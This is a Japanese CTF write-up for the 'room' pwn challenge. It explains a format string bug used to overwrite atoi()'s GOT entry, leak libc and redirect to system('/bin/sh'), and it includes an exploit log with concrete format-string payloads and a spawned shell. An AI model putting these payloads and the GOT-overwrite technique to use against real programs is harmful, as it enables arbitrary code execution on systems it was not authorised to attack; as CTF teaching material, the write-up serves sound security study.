# ar46-ctf \#200 room writeup

###### tags: `ar46` `ctf` `pwn` `fsb` `GOT Overwrite` `writeup`

> Chiho is finding Yui. Please help her!  
> Flag prefix is "AR46_"
>
> You can use these things.
>
> + [libc-2.19-c4dc1270c1449536ab2efbbe7053231f1a776368.so](https://bitbucket.org/uma_dolce/ctf/raw/master/ar46/200-room/libc-2.19-c4dc1270c1449536ab2efbbe7053231f1a776368.so)
> + [room-9d706208d63408253151e1abe72644d7c4a37cc0](https://bitbucket.org/uma_dolce/ctf/raw/master/ar46/200-room/room-9d706208d63408253151e1abe72644d7c4a37cc0)
> 
> ```
> $ echo -n [FLAG] | sha1sum
> 9434b76a6c0c8505b0ee0defb40c255e6ee7ac66  -
> ```
> 
> Designed by [@uma_dolce](https://twitter.com/uma_dolce)


## 解説

```
$ checksec ./room
[*] '***/room'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE
```

千穂ちゃんが唯ちゃんを探しています。挙動は次のとおりです。

1. 名前を入力させる。
2. 入力した名前が表示される。
3. 部屋番号を入力させる。
4. 3を3回繰り返すと千穂ちゃんが疲れてしまうので終了。

千穂ちゃんが疲れて帰ってしまう前になんとか唯ちゃんを見つけさせてあげましょう。

この問題で入力値をfgets()で受け取っている関数はgreet()とgetnumber()ですが、読み込みサイズが適切に渡されているためBOFは起こりません。更に、毎回ちゃんとバッファを0初期化しています。

しかし、greet()のprintf()にはFSBが存在します。

FSBが存在するgreet()関数は、main関数内で最初の一回しか呼ばれません。なので、この一回でどこを書き換えるかが重要です。

FSBを起こすprintf()と、getnumber()内で使われていたatoi()、そしてsystem()にはある共通点があります。それは、**全て文字列を入力値に取る1引数関数**だということです。

atoi()関数には入力のbufがそのまま入るようなので、**atoi()のGOTをprintf()のPLTに書き換える**ことにより、**強制的にFSBを引き起こします**。そして書き換えたatoi()によるFSBでlibcのアドレスをリークさせた後、オフセットを求めて**もう一度FSBでatoi()のGOTをsystem()に書き換えます**。

今回はsystem(buf)の形になり、更に毎回0初期化してくれるので、"/bin/sh"を仕込む場所や文字列にゴミが入ることを考慮しなくてよくなります。

ちなみに、**3回でsystem()を呼ぶ自信がなければforループの回数を格納する固定アドレスを書き換えることで回数を増やせる**ようになっているはずです。（確認してません）

## まとめ

1. 最初のFSBでatoi()をGOT Overwriteしてprintf()のPLTに書き換え
2. 1回目のatoi()によるFSBでlibcのアドレスをリーク
3. 2回目のFSBでatoi()をGOT Overwriteしてsystem()のGOTに書き換え
4. 3回目のatoi()でsystem("/bin/sh")発動

```
[+] Opening connection to pwn.nanimodekinai.xyz on port 31098: Done
[*] payload length: 54
[*] '(\xa0\x04\x08)\xa0\x04\x08*\xa0\x04\x08+\xa0\x04\x08%7$hhn%116c%8$hhn%128c%9$hhn%4c%10$hhn'
[*] sent first fsb payload
[*] payload length: 8
[*] '\x1c\xa0\x04\x08%7$s'
[*] sent second payload
00000000  1c a0 04 08  e0 57 59 f7  56 84 04 08  0a 0a 49 20  │····│·WY·│V···│··I │
00000010  63 6f 75 6c  64 6e 27 74  20 66 69 6e  64 20 68 65  │coul│dn't│ fin│d he│
00000020  72 20 61 74  20 72 6f 6f  6d                        │r at│ roo│m│
00000029
[+] libc base: 0xf7530000
[*] payload length: 55
[*] '(\xa0\x04\x08)\xa0\x04\x08*\xa0\x04\x08+\xa0\x04\x08%7$hhn%243c%8$hhn%84c%9$hhn%160c%10$hhn'
[*] Switching to interactive mode
$ ls
flag
room
startup.sh
$ cat flag
AR46_ch1h0_w1ll_f1nd_yu1_4nd_h3r_fr13nd5_70d4y
$ exit

I couldn't find her at room 0 :(

Uhhh... Sorry, I'm beat. She may have already gone home...
Thank you. I'll try another day. Goodbye ;)
```

千穂ちゃんは一度諦めてしまいますが、無事に唯ちゃんと友人たちに会うことができたのでした、めでたしめでたし。

実際のexploitコードは[solve.py](https://bitbucket.org/uma_dolce/ctf/src/master/ar46/200-room/solve.py)を参考にしてください。  
ソースコードは[room.c](https://bitbucket.org/uma_dolce/ctf/src/master/ar46/200-room/room.c)にあります。
